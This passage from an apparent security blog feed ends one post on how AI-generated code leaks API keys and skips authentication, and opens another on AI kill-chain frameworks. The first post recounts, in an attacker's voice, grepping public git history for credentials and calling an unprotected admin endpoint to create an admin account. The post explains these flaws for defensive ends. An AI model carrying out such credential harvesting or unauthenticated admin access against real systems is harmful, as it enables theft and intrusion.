srcset="https://substackcdn.com/image/fetch/$s_!848M!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb130c528-1596-42db-894d-bb3387502c6b_593x359.png 424w, https://substackcdn.com/image/fetch/$s_!848M!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb130c528-1596-42db-894d-bb3387502c6b_593x359.png 848w, https://substackcdn.com/image/fetch/$s_!848M!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb130c528-1596-42db-894d-bb3387502c6b_593x359.png 1272w, https://substackcdn.com/image/fetch/$s_!848M!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb130c528-1596-42db-894d-bb3387502c6b_593x359.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>How AI Coding Assistants Leak API Keys Into Git History</h2><p>When you vibe code a payment integration or an email service, you don&#8217;t wire up credentials manually. You describe the feature and the AI generates the whole thing, including the keys, hardcoded directly in the source so the code actually runs. An <strong>API key</strong> is a secret string that proves your app is authorized to talk to a service like Stripe for payments or AWS for cloud infrastructure. Leak it, and anyone holding that key can act as your application.</p><p>The AI ships hardcoded keys because that&#8217;s what &#8220;working code&#8221; looked like in its training data, millions of public repos where developers did exactly this and never rotated before pushing to GitHub. The model is doing what you asked. The problem is the pattern it learned, classified as <a href="https://cwe.mitre.org/data/definitions/798.html">CWE-798</a>: hardcoded credentials in source code. You test locally, it works, you push. The key goes with it.</p><p>We run <code>git log --all -p</code> piped through a grep for common credential patterns against the public repo. Four seconds. Stripe secret key, AWS access key, SendGrid token, all committed in the same PR that passed review because the feature worked. The AWS key gets us into the infrastructure, and the Stripe key starts pulling transaction data. The <a href="https://www.toxsec.com/p/the-voluntary-exfiltration-program">credential exfiltration pattern</a> is the same one that costs enterprises $670,000 per incident, except now the AI ships credentials faster than any human ever could.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!SAqu!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F61840b89-107e-4584-aec2-54da8f527ae3_1037x1003.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!SAqu!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F61840b89-107e-4584-aec2-54da8f527ae3_1037x1003.png 424w, https://substackcdn.com/image/fetch/$s_!SAqu!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F61840b89-107e-4584-aec2-54da8f527ae3_1037x1003.png 848w, https://substackcdn.com/image/fetch/$s_!SAqu!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F61840b89-107e-4584-aec2-54da8f527ae3_1037x1003.png 1272w, https://substackcdn.com/image/fetch/$s_!SAqu!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F61840b89-107e-4584-aec2-54da8f527ae3_1037x1003.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!SAqu!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F61840b89-107e-4584-aec2-54da8f527ae3_1037x1003.png" width="1037" height="1003" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/61840b89-107e-4584-aec2-54da8f527ae3_1037x1003.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1003,&quot;width&quot;:1037,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:71730,&quot;alt&quot;:&quot;Terminal showing git grep output with three credential matches highlighted, Stripe key, AWS access key, SendGrid token, commit hash visible, values partially redacted, dark red warning glow on each match&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/190338370?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F61840b89-107e-4584-aec2-54da8f527ae3_1037x1003.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Terminal showing git grep output with three credential matches highlighted, Stripe key, AWS access key, SendGrid token, commit hash visible, values partially redacted, dark red warning glow on each match" title="Terminal showing git grep output with three credential matches highlighted, Stripe key, AWS access key, SendGrid token, commit hash visible, values partially redacted, dark red warning glow on each match" srcset="https://substackcdn.com/image/fetch/$s_!SAqu!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F61840b89-107e-4584-aec2-54da8f527ae3_1037x1003.png 424w, https://substackcdn.com/image/fetch/$s_!SAqu!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F61840b89-107e-4584-aec2-54da8f527ae3_1037x1003.png 848w, https://substackcdn.com/image/fetch/$s_!SAqu!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F61840b89-107e-4584-aec2-54da8f527ae3_1037x1003.png 1272w, https://substackcdn.com/image/fetch/$s_!SAqu!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F61840b89-107e-4584-aec2-54da8f527ae3_1037x1003.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>Why AI-Generated Code Ships Without Authentication Checks</h2><p>When you ask an AI to scaffold a user management dashboard, it builds the feature. CRUD operations, role assignment, user creation, all of it, clean and fast. What it doesn&#8217;t build is the check that runs before any of that executes. <strong>Auth middleware</strong> is the code that verifies who&#8217;s making a request before the server processes it, the gate in front of the feature. The AI doesn&#8217;t know your auth system and has no context for how your app verifies identity, so it skips the gate entirely.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!91qP!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbca62e3a-52e7-40f2-a04a-8ebf66ac8ba9_1287x625.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!91qP!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbca62e3a-52e7-40f2-a04a-8ebf66ac8ba9_1287x625.png 424w, https://substackcdn.com/image/fetch/$s_!91qP!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbca62e3a-52e7-40f2-a04a-8ebf66ac8ba9_1287x625.png 848w, https://substackcdn.com/image/fetch/$s_!91qP!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbca62e3a-52e7-40f2-a04a-8ebf66ac8ba9_1287x625.png 1272w, https://substackcdn.com/image/fetch/$s_!91qP!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbca62e3a-52e7-40f2-a04a-8ebf66ac8ba9_1287x625.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!91qP!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbca62e3a-52e7-40f2-a04a-8ebf66ac8ba9_1287x625.png" width="725.2000122070312" height="352.1756081036477" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/bca62e3a-52e7-40f2-a04a-8ebf66ac8ba9_1287x625.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:false,&quot;imageSize&quot;:&quot;normal&quot;,&quot;height&quot;:625,&quot;width&quot;:1287,&quot;resizeWidth&quot;:725.2000122070312,&quot;bytes&quot;:66267,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/190338370?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbca62e3a-52e7-40f2-a04a-8ebf66ac8ba9_1287x625.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:&quot;center&quot;,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!91qP!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbca62e3a-52e7-40f2-a04a-8ebf66ac8ba9_1287x625.png 424w, https://substackcdn.com/image/fetch/$s_!91qP!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbca62e3a-52e7-40f2-a04a-8ebf66ac8ba9_1287x625.png 848w, https://substackcdn.com/image/fetch/$s_!91qP!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbca62e3a-52e7-40f2-a04a-8ebf66ac8ba9_1287x625.png 1272w, https://substackcdn.com/image/fetch/$s_!91qP!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbca62e3a-52e7-40f2-a04a-8ebf66ac8ba9_1287x625.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>That&#8217;s <strong>broken access control</strong>, <a href="https://owasp.org/Top10/A01_2021-Broken_Access_Control/">OWASP&#8217;s #1 web application security risk</a>. The route is live, and anyone can call it. The AI never had the information to do it right in the first place. Vibe coding makes this worse because the whole premise is speed: describe, generate, ship. The <a href="https://www.toxsec.com/p/nvidias-ai-kill-chain">AI kill chain</a> runs fastest when nobody pauses to check the scaffolding.</p><p>We find the repo on GitHub and pull the routes file. <code>POST /api/admin/users</code>, handler defined, no middleware in the chain before it. We send a POST with no token, no session cookie. The endpoint creates a new admin user and returns 201, full admin access. From there we pull the user database, reset passwords, and pivot to whatever the admin panel touches.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!aKB5!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eabec4e-61cf-40ea-a11e-6ba1090dfe6b_1053x428.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!aKB5!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eabec4e-61cf-40ea-a11e-6ba1090dfe6b_1053x428.png 424w, https://substackcdn.com/image/fetch/$s_!aKB5!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eabec4e-61cf-40ea-a11e-6ba1090dfe6b_1053x428.png 848w, https://substackcdn.com/image/fetch/$s_!aKB5!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eabec4e-61cf-40ea-a11e-6ba1090dfe6b_1053x428.png 1272w, https://substackcdn.com/image/fetch/$s_!aKB5!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eabec4e-61cf-40ea-a11e-6ba1090dfe6b_1053x428.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!aKB5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eabec4e-61cf-40ea-a11e-6ba1090dfe6b_1053x428.png" width="1053" height="428" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/8eabec4e-61cf-40ea-a11e-6ba1090dfe6b_1053x428.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:428,&quot;width&quot;:1053,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:32033,&quot;alt&quot;:&quot;Burp Suite repeater showing POST /api/admin/users request with empty Authorization header, response 201 Created with new admin user JSON, next to routes file showing handler with no auth middleware, nuclear green on dark&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/190338370?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eabec4e-61cf-40ea-a11e-6ba1090dfe6b_1053x428.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Burp Suite repeater showing POST /api/admin/users request with empty Authorization header, response 201 Created with new admin user JSON, next to routes file showing handler with no auth middleware, nuclear green on dark" title="Burp Suite repeater showing POST /api/admin/users request with empty Authorization header, response 201 Created with new admin user JSON, next to routes file showing handler with no auth middleware, nuclear green on dark" srcset="https://substackcdn.com/image/fetch/$s_!aKB5!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eabec4e-61cf-40ea-a11e-6ba1090dfe6b_1053x428.png 424w, https://substackcdn.com/image/fetch/$s_!aKB5!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eabec4e-61cf-40ea-a11e-6ba1090dfe6b_1053x428.png 848w, https://substackcdn.com/image/fetch/$s_!aKB5!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eabec4e-61cf-40ea-a11e-6ba1090dfe6b_1053x428.png 1272w, https://substackcdn.com/image/fetch/$s_!aKB5!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8eabec4e-61cf-40ea-a11e-6ba1090dfe6b_1053x428.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>The Compound Blast Radius of Three Vibe Coding Failures</h2><p>Three chapters, three AI-generated attack surfaces. Slopsquatting got us shell access before the app shipped. Hardcoded credentials handed us the infrastructure keys. Broken auth walked us into the application itself. Same AI, same afternoon, no zero-days required.</p><p>The compound blast radius is what makes this ugly. Each failure alone is bad. Chained together, they&#8217;re a full compromise: code execution on the developer&#8217;s machine, access to production infrastructure credentials, and admin-level control of the application. A Tenzai assessment of five major vibe coding tools found <a href="https://www.csoonline.com/article/4116923/output-from-vibe-coding-tools-prone-to-critical-security-flaws-study-finds.html">69 total vulnerabilities across 15 test applications</a>, including critical-severity flaws. The tools catch generic bugs but fail where context matters, and authentication, secrets management, and dependency verification all require context the model never had.</p><blockquote><p>We dropped the free chapters. Now breach the wall for the dead-simple step-by-step kill switch that shuts this all down.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote>
      <p>
          <a href="https://www.toxsec.com/p/vibe-coding-security-attack-chain">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[The AI Kill Chain Explained: Two Frameworks Every Defender Needs]]></title><description><![CDATA[What a kill chain is, why AI needs its own, and how NVIDIA and MITRE ATLAS map attacks on AI systems stage by stage.]]></description><link>https://www.toxsec.com/p/ai-kill-chain-explained</link><guid isPermaLink="false">https://www.toxsec.com/p/ai-kill-chain-explained</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Tue, 17 Mar 2026 13:32:08 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!C9ER!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19faaff4-4ca3-484d-84c6-dbe6e71e1d19_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!C9ER!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19faaff4-4ca3-484d-84c6-dbe6e71e1d19_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!C9ER!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19faaff4-4ca3-484d-84c6-dbe6e71e1d19_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!C9ER!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19faaff4-4ca3-484d-84c6-dbe6e71e1d19_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!C9ER!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19faaff4-4ca3-484d-84c6-dbe6e71e1d19_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!C9ER!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19faaff4-4ca3-484d-84c6-dbe6e71e1d19_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!C9ER!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19faaff4-4ca3-484d-84c6-dbe6e71e1d19_2752x1536.png" width="2752" height="1536" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/19faaff4-4ca3-484d-84c6-dbe6e71e1d19_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:7211388,&quot;alt&quot;:&quot;AI kill chain explained NVIDIA five stages MITRE ATLAS framework prompt injection agentic AI security attack defense&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/190867088?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd3c7e3c1-b237-4e1c-b6d0-1bcb4f20d70c_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="AI kill chain explained NVIDIA five stages MITRE ATLAS framework prompt injection agentic AI security attack defense" title="AI kill chain explained NVIDIA five stages MITRE ATLAS framework prompt injection agentic AI security attack defense" srcset="https://substackcdn.com/image/fetch/$s_!C9ER!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19faaff4-4ca3-484d-84c6-dbe6e71e1d19_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!C9ER!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19faaff4-4ca3-484d-84c6-dbe6e71e1d19_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!C9ER!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19faaff4-4ca3-484d-84c6-dbe6e71e1d19_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!C9ER!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F19faaff4-4ca3-484d-84c6-dbe6e71e1d19_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong> A kill chain maps every step an attacker takes, so defenders can break any one link and stop the whole thing. AI systems need their own because the attacks look nothing like traditional hacking. NVIDIA&#8217;s AI Kill Chain gives you the five stages. MITRE ATLAS gives you the technique catalog. Here&#8217;s how both work.</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe 